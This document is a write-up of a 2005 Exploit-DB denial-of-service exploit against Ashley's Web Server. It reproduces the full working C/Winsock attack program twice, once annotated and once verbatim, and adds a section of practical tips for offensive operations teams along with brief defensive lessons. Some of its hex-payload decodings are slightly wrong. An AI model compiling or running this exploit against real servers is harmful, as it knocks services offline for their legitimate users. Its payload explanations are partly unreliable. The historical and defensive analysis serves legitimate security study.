Understanding Ashley's Web Server Denial of Service Exploit

What this paper is

This paper details a Denial of Service (DoS) exploit targeting Ashley's Web Server, a software that was likely in use around 2005. The exploit works by sending a malformed HTTP request to the server, causing it to crash or become unresponsive. This prevents legitimate users from accessing the server.

Simple technical breakdown

The exploit is a C program that uses the Windows Sockets API (Winsock) to connect to a target server. It crafts a specific, invalid HTTP request and sends it. The Ashley's Web Server software, when it receives this malformed request, fails to process it correctly and crashes.

The core of the exploit lies in the doscore character array, which contains the specially crafted HTTP request. This request is designed to trigger a vulnerability in how the server handles certain HTTP headers or request structures.

Complete code and payload walkthrough

Let's break down the C code and the doscore payload.

#include <string.h>
#include <winsock2.h>
#include <stdio.h>

#pragma comment(lib, "ws2_32.lib")

• Includes: These lines include necessary header files for string manipulation (string.h), Windows networking functions (winsock2.h), and standard input/output (stdio.h).
• #pragma comment(lib, "ws2_32.lib"): This directive tells the Microsoft Visual C++ compiler to automatically link the ws2_32.lib library, which contains the Winsock functions.

char doscore[] = "GET  HTTP/1.0 "
"\x3f\x3f\x3f\x3f\x3f\x2e\x48\x54\x4d\x4c\x3f\x74\x65\x73\x74\x76"
"\x61\x72\x69\x61\x62\x6c\x65\x3d\x26\x6e\x65\x78\x74\x74\x65\x73"
"\x74\x76\x61\x72\x69\x61\x62\x6c\x65\x3d\x67\x69\x66\x20\x48\x54"
"\x54\x50\x2f\x31\x2e\x31\x0a\x52\x65\x66\x65\x72\x65\x72\x3a\x20"
"\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x6f\x63\x61\x6c\x68\x6f\x73\x74"
"\x2f\x62\x6f\x62\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70"
"\x65\x3a\x20\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78"
"\x2d\x77\x77\x77\x2d\x66\x6f\x72\x6d\x2d\x75\x72\x6c\x65\x6e\x63"
"\x6f\x64\x65\x64\x0a\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x3a"
"\x20\x4b\x65\x65\x70\x2d\x41\x6c\x69\x76\x65\x0a\x43\x6f\x6f\x6b"
"\x69\x65\x3a\x20\x56\x41\x52\x49\x41\x42\x4c\x45\x3d\x53\x45\x43"
"\x55\x52\x49\x54\x59\x2d\x50\x52\x4f\x54\x4f\x43\x4f\x4c\x53\x3b"
"\x20\x70\x61\x74\x68\x3d\x2f\x0a\x55\x73\x65\x72\x2d\x41\x67\x65"
"\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x34\x2e\x37\x36"
"\x20\x5b\x65\x6e\x5d\x20\x28\x58\x31\x31\x3b\x20\x55\x3b\x20\x4c"
"\x69\x6e\x75\x78\x20\x32\x2e\x34\x2e\x32\x2d\x32\x20\x69\x36\x38"
"\x36\x29\x0a\x56\x61\x72\x69\x61\x62\x6c\x65\x3a\x20\x72\x65\x73"
"\x75\x6c\x74\x0a\x48\x6f\x73\x74\x3a\x20\x6c\x6f\x63\x61\x6c\x68"
"\x6f\x73\x74\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x6c\x65\x6e\x67"
"\x74\x68\x3a\x20\x20\x20\x20\x20\x35\x31\x33\x0a\x41\x63\x63\x65"
"\x70\x74\x3a\x20\x69\x6d\x61\x67\x65\x2f\x67\x69\x66\x2c\x20\x69"
"\x6d\x61\x67\x65\x2f\x78\x2d\x78\x62\x69\x74\x6d\x61\x70\x2c\x20"
"\x69\x6d\x61\x67\x65\x2f\x6a\x70\x65\x67\x2c\x20\x69\x6d\x61\x67"
"\x65\x2f\x70\x6a\x70\x65\x67\x2c\x20\x69\x6d\x61\x67\x65\x2f\x70"
"\x6e\x67\x0a\x41\x63\x63\x65\x70\x74\x2d\x45\x6e\x63\x6f\x64\x69"
"\x6e\x67\x3a\x20\x67\x7a\x69\x70\x0a\x41\x63\x63\x65\x70\x74\x2d"
"\x4c\x61\x6e\x67\x75\x61\x67\x65\x3a\x20\x65\x6e\x0a\x41\x63\x63"
"\x65\x70\x74\x2d\x43\x68\x61\x72\x73\x65\x74\x3a\x20\x69\x73\x6f"
"\x2d\x38\x38\x35\x39\x2d\x31\x2c\x2a\x2c\x75\x74\x66\x2d\x38\x0a"
"\x0a\x0a\x77\x68\x61\x74\x79\x6f\x75\x74\x79\x70\x65\x64\x3d\x41"
"\x69\x6d\x61\x67\x65\r\n";

• char doscore[] = ...: This defines a character array named doscore. This array holds the raw bytes of the HTTP request that will be sent to the server.
• "GET HTTP/1.0 ": This is the start of the HTTP request. It's a malformed GET request. Notice the double space after GET and the missing resource path before HTTP/1.0. This is a key indicator of a potentially malformed request.
• "\x3f\x3f\x3f\x3f\x3f\x2e\x48\x54\x4d\x4c\x3f\x74\x65\x73\x74\x76\x61\x72\x69\x61\x62\x6c\x65\x3d\x26\x6e\x65\x78\x74\x74\x65\x73\x74\x76\x61\x72\x69\x61\x62\x6c\x65\x3d\x67\x69\x66\x20\x48\x54\x54\x50\x2f\x31\x2e\x31\x0a\x52\x65\x66\x65\x72\x65\x72\x3a\x20\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x6f\x63\x61\x6c\x68\x6f\x73\x74\x2f\x62\x6f\x62\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x2d\x77\x77\x77\x2d\x66\x6f\x72\x6d\x2d\x75\x72\x6c\x65\x6e\x63\x6f\x64\x65\x64\x0a\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x3a\x20\x4b\x65\x65\x70\x2d\x41\x6c\x69\x76\x65\x0a\x43\x6f\x6f\x6b\x69\x65\x3a\x20\x56\x41\x52\x49\x41\x42\x4c\x45\x3d\x53\x45\x43\x55\x52\x49\x54\x59\x2d\x50\x52\x4f\x54\x4f\x43\x4f\x4c\x53\x3b\x20\x70\x61\x74\x68\x3d\x2f\x0a\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x34\x2e\x37\x36\x20\x5b\x65\x6e\x5d\x20\x28\x58\x31\x31\x3b\x20\x55\x3b\x20\x4c\x69\x6e\x75\x78\x20\x32\x2e\x34\x2e\x32\x2d\x32\x20\x69\x36\x38\x36\x29\x0a\x56\x61\x72\x69\x61\x62\x6c\x65\x3a\x20\x72\x65\x73\x75\x6c\x74\x0a\x48\x6f\x73\x74\x3a\x20\x6c\x6f\x63\x61\x6c\x68\x6f\x73\x74\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x6c\x65\x6e\x67\x74\x68\x3a\x20\x20\x20\x20\x20\x35\x31\x33\x0a\x41\x63\x63\x65\x70\x74\x3a\x20\x69\x6d\x61\x67\x65\x2f\x67\x69\x66\x2c\x20\x69\x6d\x61\x67\x65\x2f\x78\x2d\x78\x62\x69\x74\x6d\x61\x70\x2c\x20\x69\x6d\x61\x67\x65\x2f\x6a\x70\x65\x67\x2c\x20\x69\x6d\x61\x67\x65\x2f\x70\x6a\x70\x65\x67\x2c\x20\x69\x6d\x61\x67\x65\x2f\x70\x6e\x67\x0a\x41\x63\x63\x65\x70\x74\x2d\x45\x6e\x63\x6f\x64\x69\x6e\x67\x3a\x20\x67\x7a\x69\x70\x0a\x41\x63\x63\x65\x70\x74\x2d\x4c\x61\x6e\x67\x75\x61\x67\x65\x3a\x20\x65\x6e\x0a\x41\x63\x63\x65\x70\x74\x2d\x43\x68\x61\x72\x73\x65\x74\x3a\x20\x69\x73\x6f\x2d\x38\x38\x35\x39\x2d\x31\x2c\x2a\x2c\x75\x74\x66\x2d\x38\x0a\x0a\x0a\x77\x68\x61\x74\x79\x6f\x75\x74\x79\x70\x65\x64\x3d\x41\x69\x6d\x61\x67\x65\r\n";: This is the core payload. It's a series of hexadecimal escape sequences (\xXX) and some printable ASCII characters. Let's decode some of the key parts:
  • \x3f\x3f\x3f\x3f\x3f: These are question marks. The unusual repetition might be part of the malformation.
  • \x2e\x48\x54\x4d\x4c: This decodes to .HTML.
  • \x3f\x74\x65\x73\x74\x76\x61\x72\x69\x61\x62\x6c\x65\x3d\x26\x6e\x65\x78\x74\x74\x65\x73\x74\x76\x61\x72\x69\x61\x62\x6c\x65\x3d\x67\x69\x66: This decodes to ?variable=&nexttestvariable=gif. This looks like it's trying to set URL parameters, but the context is unusual for a GET request without a path.
  • \x20\x48\x54\x50\x2f\x31\x2e\x31\x0a: This decodes to HTTP/1.1\n. This is a valid HTTP version, but it's placed after the malformed start.
  • The rest of the payload consists of standard HTTP headers like Referer, Content-Type, Connection, Cookie, User-Agent, Host, Content-Length, Accept, Accept-Encoding, Accept-Language, and Accept-Charset.
  • \x0a\x0a\x0a: These are three newline characters, which typically separate HTTP headers from the body.
  • \x77\x68\x61\x74\x79\x6f\x75\x74\x79\x70\x65\x64\x3d\x41\x69\x6d\x61\x67\x65\r\n: This decodes to whatyoutyped=Aimage\r\n. This appears to be a malformed or unexpected header/body content.

The combination of the malformed GET request start, the unusual parameters, and potentially the unexpected whatyoutyped field is what likely triggers the vulnerability in Ashley's Web Server.

int main(int argc, char *argv[])
{
WSADATA wsaData;
WORD wVersionRequested;
struct hostent *pTarget;
struct sockaddr_in sock;
char *target;
int port,bufsize;
SOCKET inetdos;

• main function: The entry point of the program.
• Variable declarations: Declares variables for Winsock initialization (wsaData, wVersionRequested), host information (pTarget), socket address (sock), target IP/hostname (target), port number (port), buffer size (bufsize), and the socket descriptor (inetdos).

if (argc < 2)
{
printf("        Ashley's Server DoS Exploit \n", argv[0]);
printf("  -------------------------------------\n", argv[0]);
printf("    INFGP - Hacking&Security Research\n\n", argv[0]);
printf("[-]Usage: %s [target] [port]\n", argv[0]);
printf("[?]Exam: localhost 80\n", argv[0]);
exit(1);
}

• Argument check: Checks if the program received at least one command-line argument (the target). If not, it prints usage instructions and exits.

wVersionRequested = MAKEWORD(1, 1);
if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1;

• Winsock initialization: Initializes the Winsock library. MAKEWORD(1, 1) requests version 1.1 of Winsock. WSAStartup must be called before any other Winsock functions.

target = argv[1];
port = 80;

if (argc >= 3) port = atoi(argv[2]);
bufsize = 1024;
if (argc >= 4) bufsize = atoi(argv[3]);

• Parameter parsing:
  • Sets the target to the first command-line argument.
  • Sets the default port to 80 (standard HTTP).
  • If a third argument is provided, it's parsed as the port number using atoi.
  • Sets a default bufsize to 1024.
  • If a fourth argument is provided, it's parsed as the buffer size. (Note: bufsize is declared but not explicitly used later in the send call, which uses sizeof(doscore)-1).

inetdos = socket(AF_INET, SOCK_STREAM, 0);
if(inetdos==INVALID_SOCKET)
{
printf("Socket ERROR \n");
exit(1);
}

• Socket creation: Creates a TCP socket.
  • AF_INET: Specifies the IPv4 address family.
  • SOCK_STREAM: Specifies a stream socket (for TCP).
  • 0: Specifies the default protocol (TCP).
• Error handling: Checks if socket creation failed.

printf("Resolve host... ");
if ((pTarget = gethostbyname(target)) == NULL)
{
printf("FAILED \n", argv[0]);
exit(1);
}
printf("[OK]\n ");

• Hostname resolution: Uses gethostbyname to resolve the target hostname or IP address into an IP address structure.
• Error handling: Exits if the hostname cannot be resolved.

memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
sock.sin_family = AF_INET;
sock.sin_port = htons((USHORT)port);

• Socket address setup:
  • Copies the IP address from the resolved host entry into the sockaddr_in structure.
  • Sets the address family to IPv4.
  • Converts the port number to network byte order using htons (host to network short).

printf("[+] Connecting... ");
if ( (connect(inetdos, (struct sockaddr *)&sock, sizeof (sock) )))
{
printf("FAILED\n");
exit(1);
}
printf("[OK]\n");
printf("Target locked\n");

• Connection: Attempts to connect to the target server using the configured socket address.
• Error handling: Exits if the connection fails.

printf("Sending bad procedure... ");
if (send(inetdos, doscore, sizeof(doscore)-1, 0) == -1)
{
printf("ERROR\n");
closesocket(inetdos);
exit(1);
}
printf("[OK]\n ");

• Sending the payload:
  • send(inetdos, doscore, sizeof(doscore)-1, 0): This is the crucial step. It sends the contents of the doscore array over the established TCP connection.
    • inetdos: The socket descriptor.
    • doscore: The buffer containing the data to send.
    • sizeof(doscore)-1: The number of bytes to send. sizeof(doscore) includes the null terminator, so -1 is used to send only the actual payload characters.
    • 0: Flags (no special options).
• Error handling: Checks for errors during the send operation.

printf("[+] Server DoS'ed\n");
closesocket(inetdos);
WSACleanup();
return 0;
}

• Cleanup:
  • Prints a success message.
  • closesocket(inetdos): Closes the network socket.
  • WSACleanup(): Cleans up the Winsock library resources.
  • Returns 0, indicating successful execution.

Mapping list:

• #include <winsock2.h> -> Enables Windows network programming functions.
• #pragma comment(lib, "ws2_32.lib") -> Links the necessary Winsock library.
• char doscore[] = ... -> Contains the malformed HTTP request payload.
• WSADATA wsaData; WORD wVersionRequested; -> Variables for Winsock initialization.
• WSAStartup(...) -> Initializes the Winsock library.
• socket(AF_INET, SOCK_STREAM, 0) -> Creates a TCP socket for IPv4.
• gethostbyname(target) -> Resolves the target hostname to an IP address.
• sockaddr_in sock; -> Structure to hold the server's address and port.
• memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length); -> Populates the IP address in the socket structure.
• sock.sin_family = AF_INET; -> Sets the address family to IPv4.
• sock.sin_port = htons((USHORT)port); -> Sets the target port in network byte order.
• connect(inetdos, (struct sockaddr *)&sock, sizeof (sock)) -> Establishes a TCP connection to the target.
• send(inetdos, doscore, sizeof(doscore)-1, 0) -> Sends the malformed HTTP request to the server.
• closesocket(inetdos) -> Closes the network connection.
• WSACleanup() -> Uninitializes the Winsock library.
• exit(1) -> Terminates the program with an error code.

Practical details for offensive operations teams

• Required Access Level: Network access to the target server is required. No local privileges on the target are needed, as this is a network-based attack.
• Lab Preconditions:
  • A Windows machine with the Winsock 2.x library installed (standard on modern Windows).
  • A vulnerable Ashley's Web Server instance running on a target machine. The exact version vulnerable is not specified, but it's likely an older version from around 2005.
  • Network connectivity between the attacker machine and the target server.
• Tooling Assumptions:
  • A C compiler (like MinGW or Visual Studio) to compile the exploit code.
  • The compiled executable.
• Execution Pitfalls:
  • Firewalls: Network firewalls blocking outbound TCP connections to the target port (usually 80).
  • Intrusion Detection/Prevention Systems (IDS/IPS): Modern IDS/IPS might detect the malformed HTTP request signature.
  • Server Configuration: The server might be configured to handle malformed requests gracefully, or it might be patched against this specific vulnerability.
  • Network Latency: High latency could potentially cause issues with the connect or send operations, though for a DoS, this is less critical than for exploitation requiring precise timing.
  • Incorrect Target/Port: Specifying the wrong IP address or port will result in a connection failure.
  • Non-Vulnerable Server: The target server might not be Ashley's Web Server or might be a version that is not vulnerable.
• Tradecraft Considerations:
  • Reconnaissance: Confirming the target is running Ashley's Web Server and identifying its version is crucial before attempting this exploit.
  • Stealth: This exploit is noisy. It will likely generate significant network traffic and server-side logs. For covert operations, this would be unsuitable.
  • Impact Assessment: Understand that this is a DoS attack, meaning it will disrupt service for all users. Ensure authorization covers such actions.
• Payload Delivery: The payload is the C source code itself, which needs to be compiled into an executable. The executable is then run from the attacker's machine.

Where this was used and when

• Context: This exploit was published on Exploit-DB in May 2005. This indicates it was likely discovered and weaponized around that time.
• Target Software: Ashley's Web Server. This was a relatively simple web server software.
• Operating System: The exploit code is written for Windows due to its use of Winsock.
• Approximate Years: The exploit was active and known around 2005. It's highly unlikely to be effective against modern, patched web servers or operating systems.

Defensive lessons for modern teams

• Input Validation: Web servers must rigorously validate all incoming requests, including HTTP methods, paths, headers, and body content. Unexpected or malformed data should be rejected gracefully, not cause a crash.
• Robust Error Handling: Implement comprehensive error handling to prevent crashes or unhandled exceptions when encountering malformed requests.
• Regular Patching: Keep all web server software and operating systems up-to-date with the latest security patches. Vendors often release fixes for vulnerabilities like this.
• Network Segmentation and Firewalls: Isolate critical servers and use firewalls to restrict access to only necessary ports and protocols.
• Intrusion Detection/Prevention Systems (IDS/IPS): Deploy and maintain IDS/IPS solutions that can detect and block known attack patterns, including malformed HTTP requests.
• Web Application Firewalls (WAFs): WAFs can provide an additional layer of defense by inspecting HTTP traffic for malicious patterns before it reaches the web server.
• Logging and Monitoring: Implement robust logging for web server access and errors. Monitor these logs for suspicious activity, such as repeated failed connection attempts or unusual request patterns.

ASCII visual (if applicable)

This exploit is a client-server interaction. A simple visual representation:

+-----------------+       +------------------------+
| Attacker Machine| ----> | Target: Ashley's Web   |
| (Exploit Client)|       | Server                 |
+-----------------+       +------------------------+
        |                         ^
        | 1. Connect              | 3. Crash/Unresponsive
        | 2. Send Malformed       |
        |    HTTP Request         |
        +-------------------------+

This diagram shows the attacker's machine initiating a connection and sending the malicious request. The target server, upon receiving this request, is expected to crash.

Source references

• Paper ID: 978
• Paper Title: Ashley's Web Server - Denial of Service
• Author: basher13
• Published: 2005-05-04
• Keywords: Windows, dos
• Paper URL: https://www.exploit-db.com/papers/978
• Raw URL: https://www.exploit-db.com/raw/978

Original Exploit-DB Content (Verbatim)

#include <string.h>
#include <winsock2.h>
#include <stdio.h>

#pragma comment(lib, "ws2_32.lib")

char doscore[] = "GET  HTTP/1.0 "
"\x3f\x3f\x3f\x3f\x3f\x2e\x48\x54\x4d\x4c\x3f\x74\x65\x73\x74\x76"
"\x61\x72\x69\x61\x62\x6c\x65\x3d\x26\x6e\x65\x78\x74\x74\x65\x73"
"\x74\x76\x61\x72\x69\x61\x62\x6c\x65\x3d\x67\x69\x66\x20\x48\x54"
"\x54\x50\x2f\x31\x2e\x31\x0a\x52\x65\x66\x65\x72\x65\x72\x3a\x20"
"\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x6f\x63\x61\x6c\x68\x6f\x73\x74"
"\x2f\x62\x6f\x62\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70"
"\x65\x3a\x20\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78"
"\x2d\x77\x77\x77\x2d\x66\x6f\x72\x6d\x2d\x75\x72\x6c\x65\x6e\x63"
"\x6f\x64\x65\x64\x0a\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x3a"
"\x20\x4b\x65\x65\x70\x2d\x41\x6c\x69\x76\x65\x0a\x43\x6f\x6f\x6b"
"\x69\x65\x3a\x20\x56\x41\x52\x49\x41\x42\x4c\x45\x3d\x53\x45\x43"
"\x55\x52\x49\x54\x59\x2d\x50\x52\x4f\x54\x4f\x43\x4f\x4c\x53\x3b"
"\x20\x70\x61\x74\x68\x3d\x2f\x0a\x55\x73\x65\x72\x2d\x41\x67\x65"
"\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x34\x2e\x37\x36"
"\x20\x5b\x65\x6e\x5d\x20\x28\x58\x31\x31\x3b\x20\x55\x3b\x20\x4c"
"\x69\x6e\x75\x78\x20\x32\x2e\x34\x2e\x32\x2d\x32\x20\x69\x36\x38"
"\x36\x29\x0a\x56\x61\x72\x69\x61\x62\x6c\x65\x3a\x20\x72\x65\x73"
"\x75\x6c\x74\x0a\x48\x6f\x73\x74\x3a\x20\x6c\x6f\x63\x61\x6c\x68"
"\x6f\x73\x74\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x6c\x65\x6e\x67"
"\x74\x68\x3a\x20\x20\x20\x20\x20\x35\x31\x33\x0a\x41\x63\x63\x65"
"\x70\x74\x3a\x20\x69\x6d\x61\x67\x65\x2f\x67\x69\x66\x2c\x20\x69"
"\x6d\x61\x67\x65\x2f\x78\x2d\x78\x62\x69\x74\x6d\x61\x70\x2c\x20"
"\x69\x6d\x61\x67\x65\x2f\x6a\x70\x65\x67\x2c\x20\x69\x6d\x61\x67"
"\x65\x2f\x70\x6a\x70\x65\x67\x2c\x20\x69\x6d\x61\x67\x65\x2f\x70"
"\x6e\x67\x0a\x41\x63\x63\x65\x70\x74\x2d\x45\x6e\x63\x6f\x64\x69"
"\x6e\x67\x3a\x20\x67\x7a\x69\x70\x0a\x41\x63\x63\x65\x70\x74\x2d"
"\x4c\x61\x6e\x67\x75\x61\x67\x65\x3a\x20\x65\x6e\x0a\x41\x63\x63"
"\x65\x70\x74\x2d\x43\x68\x61\x72\x73\x65\x74\x3a\x20\x69\x73\x6f"
"\x2d\x38\x38\x35\x39\x2d\x31\x2c\x2a\x2c\x75\x74\x66\x2d\x38\x0a"
"\x0a\x0a\x77\x68\x61\x74\x79\x6f\x75\x74\x79\x70\x65\x64\x3d\x41"
"\x69\x6d\x61\x67\x65\r\n";

int main(int argc, char *argv[])
{
WSADATA wsaData;
WORD wVersionRequested;
struct hostent *pTarget;
struct sockaddr_in sock;
char *target;
int port,bufsize;
SOCKET inetdos;

if (argc < 2)
{
printf("        Ashley's Server DoS Exploit \n", argv[0]);
printf("  -------------------------------------\n", argv[0]);
printf("    INFGP - Hacking&Security Research\n\n", argv[0]);
printf("[-]Usage: %s [target] [port]\n", argv[0]);
printf("[?]Exam: localhost 80\n", argv[0]);
exit(1);
}

wVersionRequested = MAKEWORD(1, 1);
if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1;

target = argv[1];
port = 80;

if (argc >= 3) port = atoi(argv[2]);
bufsize = 1024;
if (argc >= 4) bufsize = atoi(argv[3]);

inetdos = socket(AF_INET, SOCK_STREAM, 0);
if(inetdos==INVALID_SOCKET)
{
printf("Socket ERROR \n");
exit(1);
}

printf("Resolve host... ");
if ((pTarget = gethostbyname(target)) == NULL)
{
printf("FAILED \n", argv[0]);
exit(1);
}
printf("[OK]\n ");
memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
sock.sin_family = AF_INET;
sock.sin_port = htons((USHORT)port);

printf("[+] Connecting... ");
if ( (connect(inetdos, (struct sockaddr *)&sock, sizeof (sock) )))
{
printf("FAILED\n");
exit(1);
}
printf("[OK]\n");
printf("Target locked\n");
printf("Sending bad procedure... ");
if (send(inetdos, doscore, sizeof(doscore)-1, 0) == -1)
{
printf("ERROR\n");
closesocket(inetdos);
exit(1);
}
printf("[OK]\n ");
printf("[+] Server DoS'ed\n");
closesocket(inetdos);
WSACleanup();
return 0;
}

// milw0rm.com [2005-05-04]